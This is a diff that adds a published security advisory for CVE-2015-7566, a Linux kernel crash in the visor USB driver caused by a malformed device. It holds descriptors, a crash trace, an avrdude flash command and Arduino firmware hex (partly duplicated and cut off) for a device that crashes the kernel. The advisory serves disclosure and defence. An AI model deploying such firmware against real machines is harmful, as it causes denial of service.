+:1005D000EAE7F0E0808184608083808182608083AC +:1005E000808181608083808180688083089590E02D +:1005F000FC013197EE30F10590F5EA5AFF4F0C946B +:10060000AB09809180008F7703C0809180008F7D3F +:1006100080938000089584B58F7702C084B58F7D64 +:1006200084BD0895809190008F7707C080919000DD +:100630008F7D03C080919000877F80939000089504 +:100640008091C0008F7703C08091C0008F7D809320 +:10065000C00008958091C200877F8093C2000895F2 +:10066000CF93DF9390E0FC01EA51FF4F2491FC010E +:10067000EC5FFE4F8491882349F190E0880F991F29 +:10068000FC01E25CFE4FA591B491805D9E4FFC01A0 +:10069000C591D4919FB7611108C0F8948C912095B1 +:1006A00082238C93888182230AC0623051F4F894AB +:1006B0008C91322F309583238C938881822B888371 +:1006C00004C0F8948C91822B8C939FBFDF91CF91C3 +:1006D00008950F931F93CF93DF931F92CDB7DEB78B +:1006E000282F30E0F901E853FF4F8491F901EA51D6 +:1006F000FF4F1491F901EC5FFE4F04910023C9F004 +:10070000882321F069830E94F7026981E02FF0E0DD +:10071000EE0FFF1FE05DFE4FA591B4919FB7F894D7 +:100720008C91611103C01095812301C0812B8C93A2 +:100730009FBF0F90DF91CF911F910F910895CF939D +:10074000DF93282F30E0F901E853FF4F8491F9013E 
+:10075000EA51FF4FD491F901EC5FFE4FC491CC23D5 +:1007600091F081110E94F702EC2FF0E0EE0FFF1FD5 +:10077000EE5DFE4FA591B4912C912D2381E090E088 +:1007800021F480E002C080E090E0DF91CF910895F5 +:10079000615030F02091F100FC0120830196F8CFE8 +:1007A000289884E680937D0508951092E9001092C0 +:1007B00071051092700590936F0580936E050895F2 +:1007C000FF920F931F93CF93DF93F82E8B01EA01D3 +:1007D000BA01C8010E94A606F80120E030E08EEFC1 +:1007E0002C173D0791F1F7FE02C0A49101C0A08132 +:1007F000609170057091710540916E0550916F0583 +:1008000064177507ACF49091E8009570E1F390914E +:10081000E80092FD1CC0A093F100A0917005B0917A +:1008200071051196AF73BB27AB2B11F48093E800D1 +:10083000A0917005B09171051196B0937105A093C8 +:1008400070052F5F3F4F3196CBCFC90102C08FEFAC +:100850009FEFDF91CF911F910F91FF9008951F920D +:100860000F920FB60F9211246F927F928F929F92E8 +:10087000AF92BF92CF92DF92EF92FF920F931F93AE +:100880002F933F934F935F936F937F938F939F9398 +:10089000AF93BF93EF93FF93CF93DF93CDB7DEB7C3 +:1008A0006297DEBFCDBF1092E9008091E80083FF20 +:1008B00046C168E0CE010A960E94C80382EF809389 +:1008C000E8009A8597FF05C08091E80080FFFCCF83 +:1008D00003C08EEF8093E800892F807609F023C152 +:1008E0008B85811105C01092F1001092F10020C19A +:1008F000282F2D7F213009F41BC1853049F48091C8 +:10090000E80080FFFCCF8C8580688093E30010C1F5 +:10091000863009F0E1C02D8508891989223009F057 +:10092000B3C0EC848E2D90E0209173053091740556 +:10093000821793070CF09FC00E94D5031F92EF927D +:100940008DE394E09F938F930E9483068CE0E89E52 +:1009500070011124E0917505F0917605EE0DFF1DF3 +:1009600089E0DE01119601900D928A95E1F7C801A8 +:100970000E94D50349E050E0BE016F5F7F4F80E0E9 +:100980000E94E0030F900F900F900F90C12CD12C7C +:10099000612C712C33E7A32E34E0B32E4AEA842E67 +:1009A00044E0942EE0917505F0917605EE0DFF1D63 +:1009B000818590E0681679060CF0BAC07F926F923C +:1009C000BF92AF920E948306E0917505F091760583 +:1009D000EE0DFF1D628573856C0D7D1D49E050E0B5 +:1009E00080E00E94E0030F900F900F900F9000E0C6 +:1009F00010E0E0917505F0917605EE0DFF1D028483 +:100A0000F385E02DEC0DFD1D818590E00817190799 
+:100A10005CF51F930F939F928F920E948306E09143 +:100A20007505F0917605EE0DFF1D0284F385E02D2E +:100A3000EC0DFD1DC801880F991FA485B585A80F71 +:100A4000B91F4D915C910284F385E02DE80FF91FE9 +:100A50006081718180E00E94E0030F5F1F4F0F9063 +:100A60000F900F900F90C5CF8FEF681A780A8EE025 +:100A7000C80ED11C97CF8FED94E09F938F930E9467 +:100A800083060F900F9058C0C8012A8B0E94D5038F +:100A90002A892130C1F0233009F04EC08C851F9285 +:100AA0008F9389EF94E09F938F930E94830642E097 +:100AB00050E062E871E080E00E94E0030F900F9048 +:100AC0000F900F9035C04091000150E060E071E060 +:100AD00080E00E94E0032CC0873071F1883021F45F +:100AE00081E08093F10024C0893011F5937021F5E5 +:100AF000EDE4F1E081E021E096E38093E9002093CA +:100B0000EB0034913093EC009093ED008F5F3196C1 +:100B1000843099F78EE78093EA001092EA008C8582 +:100B20008093720505C0888999890E94D50304C005 +:100B30008EEF8093E80003C081E28093EB00629621 +:100B40000FB6F894DEBF0FBECDBFDF91CF91FF91FE +:100B5000EF91BF91AF919F918F917F916F915F9135 +:100B60004F913F912F911F910F91FF90EF90DF9048 +:100B7000CF90BF90AF909F908F907F906F900F908D +:100B80000FBE0F901F9018951F920F920FB60F92E5 +:100B900011248F939F938091E1001092E10083FFD5 +:100BA0000FC01092E90091E09093EB001092EC00DE +:100BB00092E39093ED001092720598E09093F0000C +:100BC00082FF1AC080917E05882339F080917E05CE +:100BD000815080937E05882369F080917D0588236C +:100BE00059F080917D05815080937D05811104C06D +:100BF000289A02C05D9AF1CF9F918F910F900FBEFE +:100C00000F901F901895CF93DF93CDB7DEB782E199 +:100C1000FE013596A0E0B1E001900D928A95E1F7D2 +:100C20008F89988D9093760580937505898D9A8D1F +:100C300090937405809373058B8D9C8D90937C05A8 +:100C400080937B058D8D9E8D90937A058093790599 +:100C50008F8D98A1909378058093770510927205F7 +:100C600081E08093D70080EA8093D80082E189BD3B +:100C700009B400FEFDCF61E070E080E090E00E94EA +:100C80007B0280E98093D8008CE08093E200109290 +:100C9000E000559A209ADF91CF91089581E08093EA +:100CA000E00008959091C80095FFFCCF8093CE009E +:100CB00008951092CD0087E68093CC0088E1809360 +:100CC000C9008EE08093CA0008950F931F93CF93BD 
+:100CD000DF93EC018C01FE0101900020E9F73197D0 +:100CE000EC1BFD0BC8018C1B9D0B8E179F0730F46E +:100CF000F80181918F010E945206EDCFDF91CF91D3 +:100D00001F910F910895CF93DF93CDB7DEB7DA959A +:100D10000FB6F894DEBF0FBECDBFFE01EB5FFE4FF6 +:100D2000419151919F0160E071E0CE0101960E94D6 +:100D30000707CE0101960E946506D3950FB6F89479 +:100D4000DEBF0FBECDBFDF91CF9108958F929F92EE +:100D5000AF92BF92CF92DF92EF92FF920F931F93C9 +:100D6000CF93DF9300D0CDB7DEB75B0122E535E04E +:100D70003F932F9389839A830E9483068981882ECB +:100D80009A81992E0F900F9000E010E08EE5E82EEA +:100D900085E0F82E91E1C92E94E0D92E0A151B05A5 +:100DA000E4F4F40181914F0190E09F938F93FF92BF +:100DB000EF920E9483060F5F1F4FC8018F70992723 +:100DC0000F900F900F900F90892B41F7DF92CF92E9 +:100DD0000E9483060F900F90E1CF81E194E09F93F2 +:100DE0008F930E9483060F900F900F900F90DF91CA +:100DF000CF911F910F91FF90EF90DF90CF90BF9018 +:100E0000AF909F908F900895F8940C94E809AEE00D +:100E1000B0E0EDE0F7E00C94BF098C01CA0146E0B8 +:100E20004C831A83098377FF02C060E070E8615049 +:100E300071097E836D83A901BC01CE0101960E94D8 +:100E400033074D815E8157FD0AC02F8138854217D7 +:100E500053070CF49A01F801E20FF31F10822E964B +:100E6000E4E00C94DB09ACE0B0E0E9E3F7E00C94DB +:100E7000B1097C016B018A01FC0117821682838112 +:100E800081FFBDC1CE0101964C01F7019381F601AE +:100E900093FD859193FF81916F01882309F4ABC184 +:100EA000853239F493FD859193FF81916F018532ED +:100EB00029F4B70190E00E941B09E7CF512C312C97 +:100EC00020E02032A0F48B3269F030F4803259F007 +:100ED000833269F420612CC08D3239F0803339F4CB +:100EE000216026C02260246023C0286021C027FD25 +:100EF00027C030ED380F3A3078F426FF06C0FAE00C +:100F00005F9E300D1124532E13C08AE0389E300DA1 +:100F10001124332E20620CC08E3221F426FD6BC1C9 +:100F2000206406C08C3611F4206802C0883641F473 +:100F3000F60193FD859193FF81916F018111C1CFDE +:100F4000982F9F7D9554933028F40C5F1F4FFFE33B +:100F5000F9830DC0833631F0833771F0833509F0A2 +:100F60005BC022C0F801808189830E5F1F4F44243B +:100F70004394512C540115C03801F2E06F0E711CDE +:100F8000F801A080B18026FF03C0652D70E002C08B 
+:100F90006FEF7FEFC5012C870E9410092C018301A0 +:100FA0002C852F77222E17C03801F2E06F0E711CAE +:100FB000F801A080B18026FF03C0652D70E002C05B +:100FC0006FEF7FEFC5012C870E9405092C012C854E +:100FD0002068222E830123FC1BC0832D90E048163D +:100FE0005906B0F4B70180E290E00E941B093A94E0 +:100FF000F4CFF50127FC859127FE81915F01B701B0 +:1010000090E00E941B0931103A94F1E04F1A510808 +:101010004114510471F7E5C0843611F0893639F571 +:10102000F80127FF07C060817181828193810C5F85 +:101030001F4F08C060817181882777FD8095982FA8 +:101040000E5F1F4F2F76B22E97FF09C090958095A7 +:10105000709561957F4F8F4F9F4F2068B22E2AE089 +:1010600030E0A4010E944D09A82EA81844C085377D +:1010700029F42F7EB22E2AE030E025C0F22FF97F2E +:10108000BF2E8F36C1F018F4883579F0B4C08037A0 +:1010900019F0883721F0AFC02F2F2061B22EB4FE97 +:1010A0000DC08B2D8460B82E09C024FF0AC09F2F6D +:1010B0009660B92E06C028E030E005C020E130E09F +:1010C00002C020E132E0F801B7FE07C06081718103 +:1010D000828193810C5F1F4F06C06081718180E027 +:1010E00090E00E5F1F4FA4010E944D09A82EA81882 +:1010F000FB2DFF77BF2EB6FE0BC02B2D2E7FA51428 +:1011000050F4B4FE0AC0B2FC08C02B2D2E7E05C0E0 +:101110007A2C2B2D03C07A2C01C0752C24FF0DC016 +:10112000FE01EA0DF11D8081803311F4297E09C092 +:1011300022FF06C07394739404C0822F867809F04E +:10114000739423FD13C020FF06C05A2C731418F4A7 +:10115000530C5718732C731468F4B70180E290E0B5 +:101160002C870E941B0973942C85F5CF731410F4FF +:10117000371801C0312C24FF12C0B70180E390E082 +:101180002C870E941B092C8522FF17C021FF03C05A +:1011900088E590E002C088E790E0B7010CC0822F9C +:1011A000867859F021FD02C080E201C08BE227FD64 +:1011B0008DE2B70190E00E941B09A51438F4B70135 +:1011C00080E390E00E941B095A94F7CFAA94F4019F +:1011D000EA0DF11D8081B70190E00E941B09A1106A +:1011E000F5CF332009F451CEB70180E290E00E94A0 +:1011F0001B093A94F6CFF7018681978102C08FEFE1 +:101200009FEF2C96E2E10C94CD09FC010590615012 +:1012100070400110D8F7809590958E0F9F1F08950C +:10122000FC016150704001900110D8F780959095B5 +:101230008E0F9F1F08950F931F93CF93DF93182F47 +:10124000092FEB018B8181FD03C08FEF9FEF20C041 
+:1012500082FF10C04E815F812C813D814217530770 +:101260007CF4E881F9819F012F5F3F4F3983288308 +:10127000108306C0E885F985812F0995892B29F708 +:101280002E813F812F5F3F4F3F832E83812F902FF1 +:10129000DF91CF911F910F910895FA01AA2728306D +:1012A00051F1203181F1E8946F936E7F6E5F7F4F33 +:1012B0008F4F9F4FAF4FB1E03ED0B4E03CD0670FAF +:1012C000781F891F9A1FA11D680F791F8A1F911D02 +:1012D000A11D6A0F711D811D911DA11D20D009F452 +:1012E00068943F912AE0269F11243019305D319394 +:1012F000DEF6CF010895462F4770405D4193B3E07D +:101300000FD0C9F7F6CF462F4F70405D4A3318F023 +:10131000495D31FD4052419302D0A9F7EACFB4E0D4 +:10132000A6959795879577956795BA95C9F700978C +:101330006105710508959B01AC010A2E069457952D +:10134000479537952795BA95C9F7620F731F841F84 +:10135000951FA01D0895EE0FFF1F0590F491E02D3D +:1013600009942F923F924F925F926F927F928F9249 +:101370009F92AF92BF92CF92DF92EF92FF920F9324 +:101380001F93CF93DF93CDB7DEB7CA1BDB0B0FB62E +:10139000F894DEBF0FBECDBF09942A8839884888EB +:1013A0005F846E847D848C849B84AA84B984C88481 +:1013B000DF80EE80FD800C811B81AA81B981CE0F78 +:1013C000D11D0FB6F894DEBF0FBECDBFED0108955D +:0413D000F894FFCFBF +:1013D4001201000200000040AD0BEFBE000101024B +:1013E4000001220342006100640020004200410029 +:1013F40042004500250078002500780025006E0095 +:1014040025007000180342004100440020004300FE +:10141400300046004600450045002100120100024C +:10142400000000402D08000200010102030109022E +:10143400270001010000FA0705810304040C0705D5 +:10144400010204000C0705820104000C07000700D8 +:101454000700480100500072006F006C00690066CC +:101464000069006300000A550000006BFD180A00C3 +:10147400809F0AB901312B940A8101128946001315 +:10148400000257028B0A5E0AF80A5F01F212010099 +:1014940002010000400D055702000101020301B9D9 +:1014A4000A0100F80A5F0A810A220342006100640B +:1014B400002000420041004200450025007800253C +:1014C40000780025006E00250070001803420041DA +:1014D400004400200043003000460046004500451B +:1014E40000210012010002010000400D0557020016 +:1014F400010102030109040000030100000003F2DA 
+:101504000AEC0A0902270001010000FA01AB0A09EA +:101514000400000301000000090200202020202014 +:101524005F5F5F5F5F5F5F5F2020202020202020BF +:1015340020202020202020202020202020202020A7 +:1015440020205F5F5F5F5F205F5F20205F2020209F +:101554002020205F5F0A0D00202020202F205F5FC5 +:101564005F5F2F202F5F20205F5F5F5F205F5F5FE3 +:101574005F5F20205F5F5F5F5F20202020202F209F +:101584005F5F5F2F2F202F5F285F295F5F5F5F2FD3 +:10159400202F5F5F0A0D002020202F202F202020E5 +:1015A4002F205F5F205C2F205F5F20602F205F5F14 +:1015B400205C2F205F5F5F2F5F5F5F5F205C5F5F5A +:1015C400205C2F205F5F2F202F205F5F5F2F202F55 +:1015D4002F5F2F0A0D0020202F202F5F5F5F2F2009 +:1015E4002F202F202F202F5F2F202F202F5F2F2001 +:1015F400285F5F2020292F5F5F5F2F205F5F2F20F0 +:101604002F202F5F2F202F202F5F5F2F202C3C0AAD +:101614000D0020205C5F5F5F5F2F5F2F202F5F2F07 +:101624005C5F5F2C5F2F5C5F5F5F5F2F5F5F5F5F5F +:101634002F20202020202F5F5F5F5F2F5C5F5F2FB4 +:101644005F2F5C5F5F5F2F5F2F7C5F7C0A0D002044 +:101654003C3C2043485241534820414E59204F506E +:1016640045524154494E472053595354454D203E09 +:101674003E0A0D00203C3C202863292053657267F4 +:10168400656A20536368756D696C6F20323031353B +:101694002C204F70656E536F7572636520536563BC +:1016A40075726974792052616C66205370656E6E30 +:1016B4006562657267203E3E0A0D000A3E3E205078 +:1016C4007265737320627574746F6E20746F207307 +:1016D4007461727420657865637574696F6E2E2EFB +:1016E4002E0A0D005B44454255475D2045786563ED +:1016F400757465207061796C6F616420300A0D0027 +:10170400526563762D446174613A0A0D005B444569 +:101714004255475D200953656E6420436F6E6669C8 +:101724006775726174696F6E44657363726970740E +:101734006F720928696E6465783A2569292E2E2E00 +:101744000D0A005B44454255475D200953656E64AC +:1017540020496E74657266616365204465736372C3 +:101764006970746F720928696E7465726661636565 +:101774003A2569292E2E2E0D0A005B444542554711 +:101784005D200953656E6420456E64706F696E74E4 +:101794002044657363726970746F720928656E649E +:1017A400706F696E743A2569292E2E2E0D0A005B1E +:1017B40044454255475D203C3C70616E6963206D31 
+:1017C4006F64653F3E3E0D0A005B44454255475DEC +:1017D4002009203E3E20537472696E67204465736D +:1017E40063726970746F72207265717565737420A9 +:1017F4002D2073656E64696E67206D616C666F720F +:101804006D656420737472696E67212073657475E5 +:10181400702E7756616C75654C203D3D2025690D11 +:101824000A005B48455844554D505D0A0D0025306B +:041834003258200006 +:00000001FF
diff --git a/platforms/linux/dos/39540.txt b/platforms/linux/dos/39540.txt
new file mode 100755
index 000000000..6c107319e
--- /dev/null
+++ b/platforms/linux/dos/39540.txt
@@ -0,0 +1,622 @@
+OS-S Security Advisory 2016-09
+Linux visor clie_5_attach Nullpointer Dereference
+
+Date: March 4th, 2016
+Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg
+CVE: CVE-2015-7566
+CVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)
+Title: Local RedHat Enterprise Linux DoS â?? RHEL 7.1 Kernel crashes on invalid
+USB device descriptors (visor clie_5_attach driver)
+Severity: Critical. The Kernel panics. A reboot is required.
+Ease of Exploitation: Trivial
+Vulnerability type: Wrong input validation
+Products: RHEL 7.1 including all updates
+Kernel-Version: 3.10.0-229.20.1.el7.x86_64 (for debugging-purposes we used the
+CentOS Kernel kernel-debuginfo-3.10.0-229.14.1.el7)
+Vendor: Red Hat
+Vendor contacted: November, 12th 2015
+PDF of advisory: https://os-s.net/advisories/OSS-2016-09_visor_clie_5_attach.pdf
+
+Abstract:
+The Kernel 3.10.0-229.20.1.el7.x86_64 crashes on presentation of a buggy USB
+device requiring the visor (clie_5_attach) driver.
+
+Detailed product description:
+We confirmed the bug on the following system:
+RHEL 7.1
+Kernel 3.10.0-229.20.1.el7.x86_64
+Further products or kernel versions have not been tested.
+How reproducible: Always
+Actual results: Kernel crashes.
+
+Description:
+The bug was found using the USB-fuzzing framework vUSBf from Sergej Schumilo
+(github.com/schumilo) using the following device descriptor:
+
+[*] Device-Descriptor
+bLength: 0x12
+bDescriptorType: 0x1
+bcdUSB: 0x200
+bDeviceClass: 0x3
+bDeviceSubClass: 0x0
+bDeviceProtocol: 0x0
+bMaxPacketSize: 0x40
+idVendor: 0x54c
+idProduct: 0x144
+bcdDevice: 0x100
+iManufacturer: 0x1
+iProduct: 0x2
+iSerialNumbers: 0x3
+bNumConfigurations: 0x1
+
+The clie_5_attach function of the visor driver, which is called during the
+driver initialization process, expects an OUT-Bulk-Endpoint.
+Due to an incomplete sanity check, the visor driver tries to dereference null-
+pointers.
+This results in a crash of the system.
+
+****
+$ nm visor.ko.debug | grep clie_5_attach
+0000000000000030 t clie_5_attach
+$ addr2line -e visor.ko.debug 6d
+/usr/src/debug/kernel-3.10.0-229.14.1.el7/linux-3.10.0-229.14.1.el7.x86_
+64/drivers/usb/serial/visor.c:610
+****
+
+**** CentOS-Kernel linux-3.10.0-229.14.1.el7 (drivers/usb/serial/visor.c)
+...
+607
+608 pipe = usb_sndbulkpipe(serial->dev, port->bulk_out_endpointAddress);
+609 for (j = 0; j < ARRAY_SIZE(port->write_urbs); ++j)
+610 port->write_urbs[j]->pipe = pipe; /* if there is no configured OUT-
+bulk-endpoint, the kernel tries to dereference null-pointers */
+611
+612 return 0;
+613 }
+...
+****
+
+[*] Configuration-Descriptor
+bLength: 0x9
+bDescriptorType: 0x2
+wTotalLength: 0x27
+bNumInterfaces: 0x1
+bConfigurationValue: 0x1
+iConfiguration: 0x0
+bmAttributes: 0x0
+bMaxPower: 0x31
+[*] Interface-Descriptor
+bLength: 0x9
+bDescriptorType: 0x4
+bInterfaceNumber: 0x0
+bAlternateSetting: 0x0
+bNumEndpoints: 0x3
+bInterfaceClass: 0x0
+bInterfaceSubClass: 0x0
+bInterfaceProtocol: 0x0
+[*] Endpoint-Descriptor:
+bLength: 0x7
+bDescriptorType: 0x5
+bEndpointAddress: 0x81 ï?? IN-Direction
+bmAttribut: 0x1 ï?? ISO-Transfer
+wMaxPacketSize: 0x404
+bInterval: 0xc
+[*] Endpoint-Descriptor:
+bLength: 0x7
+bDescriptorType: 0x5
+bEndpointAddress: 0x1 ï??OUT-Direction
+bmAttribut: 0x1 ï??ISO-Transfer (change this
+value to 0x2, which is the value for bulk-transfer without additional
+features, and the visor driver won't crash)
+wMaxPacketSize: 0x4
+bInterval: 0xc
+[*] Endpoint-Descriptor:
+bLength: 0x7
+bDescriptorType: 0x5
+bEndpointAddress: 0x82 ï??IN-Direction
+bmAttribut: 0x1 ï??ISO-Transfer
+wMaxPacketSize: 0x4
+bInterval: 0xc
+
+Proof of Concept:
+For a proof of concept, we are providing an Arduino Leonardo firmware file. This
+firmware will emulate the defective USB device.
+
+avrdude -v -p ATMEGA32u4 -c avr109 -P /dev/ttyACM0 -b 57600 -U
+flash:w:binary.hex
+
+The firmware has been attached to this bug report.
+To prevent the automated delivery of the payload, a jumper may be used to
+connect port D3 and 3V3!
+
+Severity and Ease of Exploitation:
+The vulnerability can be easily exploited. Using our Arduino Leonardo firmware,
+only physical access to the system is required.
+
+Vendor Communication:
+We contacted Red Hat on the November, 12th 2015.
+This bug was fixed upstream. A CVE number was not assigned.
+
+References:
+https://bugzilla.redhat.com/show_bug.cgi?id=1283371
+http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?i
+d=cb3232138e37129e88240a98a1d2aba2187ff57c
+
+Kernel Stacktrace:
+
+[ 34.568077] usb 1-1: new full-speed USB device number 2 using xhci_hcd
+[ 34.791731] usb 1-1: New USB device found, idVendor=054c, idProduct=0144
+[ 34.795463] usb 1-1: New USB device strings: Mfr=1, Product=2,
+SerialNumber=3
+[ 34.799619] usb 1-1: Product: Ä?
+[ 34.804592] usb 1-1: Manufacturer: Ä?
+[ 34.810144] usb 1-1: SerialNumber: %
+[ 34.872285] usbcore: registered new interface driver visor
+[ 34.879838] usbserial: USB Serial support registered for Handspring Visor /
+Palm OS
+[ 34.890481] usbserial: USB Serial support registered for Sony Clie 5.0
+[ 34.897769] usbserial: USB Serial support registered for Sony Clie 3.5
+[ 34.914162] visor 1-1:1.0: Sony Clie 5.0 converter detected
+[ 34.920288] BUG: unable to handle kernel NULL pointer dereference at
+0000000000000058
+[ 34.921136] IP: [] clie_5_attach+0x3d/0x60 [visor]
+[ 34.921136] PGD 0
+[ 34.921136] Oops: 0002 [#1] SMP
+[ 34.921136] Modules linked in: visor(+) ip6t_rpfilter ip6t_REJECT ipt_REJECT
+xt_conntrack ebtable_nat ebtable_broute bridge stp llc ebtable_filter ebtables
+ip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6 nf_nat_ipv6 ip6table_mangle
+ip6table_security ip6table_raw ip6table_filter ip6_tables iptable_nat
+nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat nf_conntrack
+iptable_mangle iptable_security iptable_raw iptable_filter ip_tables bochs_drm
+ppdev syscopyarea sysfillrect sysimgblt ttm drm_kms_helper drm pcspkr i2c_piix4
+i2c_core serio_raw parport_pc parport xfs libcrc32c sd_mod sr_mod crc_t10dif
+cdrom crct10dif_common ata_generic pata_acpi ata_piix libata e1000 floppy
+dm_mirror dm_region_hash dm_log dm_mod
+[ 34.921136] CPU: 0 PID: 2220 Comm: systemd-udevd Not tainted
+3.10.0-229.14.1.el7.x86_64 #1
+[ 34.921136] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
+rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014
+[ 34.921136] task: ffff88000bcfa220 ti: ffff88000bd20000 task.ti: ffff88000bd20000
+[ 34.921136] RIP: 0010:[] []
+clie_5_attach+0x3d/0x60 [visor]
+[ 34.921136] RSP: 0018:ffff88000bd23a80 EFLAGS: 00010286
+[ 34.921136] RAX: 00000000c0000200 RBX: ffff88000af979d0 RCX: 0000000000000000
+[ 34.921136] RDX: ffff88000be6b000 RSI: ffff88000af979c0 RDI: ffff88000af979c0
+[ 34.921136] RBP: ffff88000bd23a80 R08: 0000000000000000 R09: 0000000000000000
+[ 34.921136] R10: 0000000000000000 R11: ffff88000c3b9800 R12: ffff88000af979d0
+[ 34.921136] R13: ffff88000c525830 R14: ffff88000af979c0 R15: ffffffffa0395200
+[ 34.921136] FS: 00007fb8082b4880(0000) GS:ffff88000fc00000(0000)
+knlGS:0000000000000000
+[ 34.921136] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b
+[ 34.921136] CR2: 0000000000000058 CR3: 000000000d2a1000 CR4:
+00000000000006f0
+[ 34.921136] DR0: 0000000000000000 DR1: 0000000000000000 DR2:
+0000000000000000
+[ 34.921136] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400
+[ 34.921136] Stack:
+[ 34.921136] ffff88000bd23c18 ffffffff8145fed1 0000000000000007 000000020bd23af8
+[ 34.921136] ffff88000c525830 0000000000000000 0000000000000000 ffffffff00000000
+[ 34.921136] ffff88000bcd0000 ffff880000000001 ffff88000bcd0090 0000000000000000
+[ 34.921136] Call Trace:
+[ 34.921136] [] usb_serial_probe+0xdb1/0x1230
+[ 34.921136] [] ? ida_get_new_above+0x7c/0x2a0
+[ 34.921136] [] ? kmem_cache_alloc+0x1ba/0x1d0
+[ 34.921136] [] ? sysfs_addrm_finish+0x42/0xe0
+[ 34.921136] [] ? __sysfs_add_one+0x61/0x100
+[ 34.921136] [] usb_probe_interface+0x1c4/0x2f0
+[ 34.921136] [] driver_probe_device+0x87/0x390
+[ 34.921136] [] __driver_attach+0x93/0xa0
+[ 34.921136] [] ? __device_attach+0x40/0x40
+[ 34.921136] [] bus_for_each_dev+0x73/0xc0
+[ 34.921136] [] driver_attach+0x1e/0x20
+[ 34.921136] [] usb_serial_register_drivers+0x29b/0x580
+[ 34.921136] [] ? 0xffffffffa0397fff
+[ 34.921136] [] usb_serial_module_init+0x1e/0x1000 [visor]
+[ 34.921136] [] do_one_initcall+0xb8/0x230
+[ 34.921136] [] load_module+0x133e/0x1b40
+[ 34.921136] [] ? ddebug_proc_write+0xf0/0xf0
+[ 34.921136] [] ? copy_module_from_fd.isra.42+0x53/0x150
+[ 34.921136] [] SyS_finit_module+0xa6/0xd0
+[ 34.921136] [] system_call_fastpath+0x16/0x1b
+[ 34.921136] Code: 28 48 8b 57 20 0f b6 80 28 02 00 00 88 82 28 02 00 00 48
+8b 0f c1 e0 0f 0d 00 00 00 c0 8b 09 c1 e1 08 09 c8 48 8b 8a 10 02 00 00 <89>
+41 58 48 8b 92 18 02 00 00 89 42 58 31 c0 5d c3 66 90 b8 ff
+[ 34.921136] RIP [] clie_5_attach+0x3d/0x60 [visor]
+[ 34.921136] RSP
+[ 34.921136] CR2: 0000000000000058
+[ 35.341720] ---[ end trace b239663354a1c556 ]---
+[ 35.347341] Kernel panic - not syncing: Fatal exception
+[ 35.348314] drm_kms_helper: panic occurred, switching back to text console
+
+Arduino Leonardo Firmware:
+
+:100000000C94A8000C94C5000C94C5000C94C50079 +:100010000C94C5000C94C5000C94C5000C94C5004C +:100020000C94C5000C94C5000C94C4050C942F04CA +:100030000C94C5000C94C5000C94C5000C94C5002C +:100040000C94C5000C94C5000C94C5000C94C5001C +:100050000C94C5000C94C5000C94C5000C940E02C1 +:100060000C94C5000C94C5000C94C5000C94C500FC +:100070000C94C5000C94C5000C94C5000C94C500EC +:100080000C94C5000C94C5000C94C5000C94C500DC +:100090000C94C5000C94C5000C94C5000C94C500CC +:1000A0000C94C5000C94C5000C94C5000B030E0302 +:1000B000010305032F032F032F03120316031A0353 +:1000C000200324032F032A030000000200080E006F +:1000D00000030401000B000000000000000000000D +:1000E00000000000000004080201104080401020C1 +:1000F00040804080080204018040201002011080EE
+:100100001020404004040404040304050202020217 +:1001100004030202020206060606060604040202A0 +:100120000204000000002300260029002C002F00FC +:1001300000000000250028002B002E0031000000E8 +:100140000000240027002A002D00300000C180811B +:1001500011241FBECFEFDAE0DEBFCDBF15E0A0E077 +:10016000B1E0E4EDF3E102C005900D92A436B107D1 +:10017000D9F725E0A4E6B5E001C01D92AF37B2077C +:10018000E1F70E94C8000C9404070C940000089545 +:10019000CF93DF93CDB7DEB7CD59D1090FB6F89421 +:1001A000DEBF0FBECDBF0E94A1020E94C70060E06B +:1001B00083E00E94300361E087E00E94300361E049 +:1001C00088E00E9430030E9459067E012AE9E20E6F +:1001D000F11C84E093E0D70111969C938E9389E003 +:1001E00094E013969C938E93129782E2E2E1F1E001 +:1001F0009E012F5F3F4F6901D90101900D928A95B1 +:10020000E1F788E1E4E3F1E0DE01939601900D92DD +:100210008A95E1F782E1ECE4F1E0DE01DB96019002 +:100220000D928A95E1F789E0EEE5F1E0DE01A05953 +:10023000BF4F01900D928A95E1F72A593F4F99E0FF +:10024000992ED901E92D1D92EA95E9F78E010957FA +:100250001F4F87E0E7E6F1E0D80101900D928A9503 +:10026000E1F7BE0160587F4F87E0EEE6F1E0DB0189 +:1002700001900D928A95E1F7AE0147585F4F87E0F4 +:10028000E5E7F1E0DA0101900D928A95E1F75E0170 +:10029000FEE8AF0EB11C86E0ECE7F1E0D50101907D +:1002A0000D928A95E1F7CE01835B9F4FEEE0DC0172 +:1002B0001D92EA95E9F7E3E0DC011996EC93D90188 +:1002C0009C92F4E01196FC9311971496EC93F9012B +:1002D000DC01292D01900D922A95E1F7FE01EC56E3 +:1002E000FF4FDC011B96FC93EE931A971D96BC9270 +:1002F000AE921C971183008373836283558344837A +:100300000C5211092CE0F80111922A95E9F721E02D +:10031000D80119962C931997FE01E059FF4F0190CF +:100320000D929A94E1F7F8019387828761E088E063 +:100330000E9469038BE492E00E94650688E892E0DF +:100340000E94650687EC92E00E94650686E093E0D5 +:100350000E94650682E493E00E9465068FE793E0C1 +:100360000E94650684EA93E00E9465068BEE93E0A6 +:100370000E94650683E00E949F03892B09F047C015 +:100380005E01F3E2AF0EB11C8824839482E1982EC3 +:1003900084E194E00E946506BF92AF92DF92CF9213 +:1003A000FF92EF921F928F921F930F932DB73EB73C +:1003B000225131090FB6F8943EBF0FBE2DBFADB725 
